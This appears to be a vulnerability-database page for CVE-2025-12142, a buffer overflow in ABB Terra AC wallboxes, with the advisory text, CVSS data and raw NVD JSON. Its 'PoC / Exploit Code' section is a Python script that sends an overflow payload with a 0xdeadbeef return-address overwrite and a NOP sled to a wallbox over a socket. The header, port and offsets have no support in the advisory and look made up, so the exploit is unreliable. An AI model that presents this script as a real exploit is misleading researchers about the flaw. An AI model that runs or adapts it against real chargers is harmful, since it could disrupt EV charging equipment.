Security Vulnerability Report
中文
CVE-2025-12142 CVSS 6.1 MEDIUM

CVE-2025-12142

Published: 2025-10-29 12:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in ABB Terra AC wallbox.This issue affects Terra AC wallbox: through 1.8.33.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ABB Terra AC wallbox < 1.8.34
ABB Terra AC wallbox through 1.8.33

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12142 PoC - ABB Terra AC Buffer Overflow # Note: This is a conceptual proof-of-concept for educational purposes only import socket import struct def create_malicious_payload(payload_size=1024): """ Create a buffer overflow payload for ABB Terra AC wallbox The actual vulnerable function doesn't check input size before copy """ # Buffer overflow payload - exceeds expected buffer size # Target the network service handling user input header = b"TERRA_CMD" # Fill buffer beyond its capacity overflow_data = b"\x41" * payload_size # Overwrite adjacent memory with controlled values # EIP overwrite pattern (if buffer is on stack) eip_overwrite = struct.pack("<I", 0xdeadbeef) # Jump address # Additional shellcode or NOP sled could be added here nop_sled = b"\x90" * 100 payload = header + overflow_data + eip_overwrite + nop_sled return payload def exploit_terra_ac(target_ip, target_port=443): """ Send malicious payload to ABB Terra AC wallbox Requires high-privilege authentication (PR:H) """ try: payload = create_malicious_payload(1024) # Establish connection to vulnerable service sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Send authentication headers (requires high privilege) auth_header = b"Authorization: Bearer <admin_token>\r\n" sock.send(auth_header) # Send malicious payload sock.send(payload) print(f"[+] Payload sent to {target_ip}:{target_port}") print(f"[+] Payload size: {len(payload)} bytes") # Check for response (device may crash or respond with error) try: response = sock.recv(1024) print(f"[+] Response: {response}") except: print("[-] No response - device may have crashed") sock.close() return True except Exception as e: print(f"[-] Exploit failed: {e}") return False if __name__ == "__main__": # Target configuration TARGET_IP = "192.168.1.100" # ABB Terra AC IP TARGET_PORT = 443 print("=" * 60) print("CVE-2025-12142 PoC - ABB Terra AC Buffer Overflow") print("=" * 60) print(f"Target: {TARGET_IP}:{TARGET_PORT}") print(f"Vulnerability: Buffer Copy without Checking Size of Input") print(f"CVSS: 6.1 (Medium)") print("=" * 60) exploit_terra_ac(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12142", "sourceIdentifier": "[email protected]", "published": "2025-10-29T12:15:35.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in ABB Terra AC wallbox.This issue affects Terra AC wallbox: through 1.8.33."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:D/RE:L/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NO", "Recovery": "AUTOMATIC", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://search.abb.com/library/Download.aspx?DocumentID=9AKK108471A8107&LanguageCode=en&DocumentPartId=&Action=Launch", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.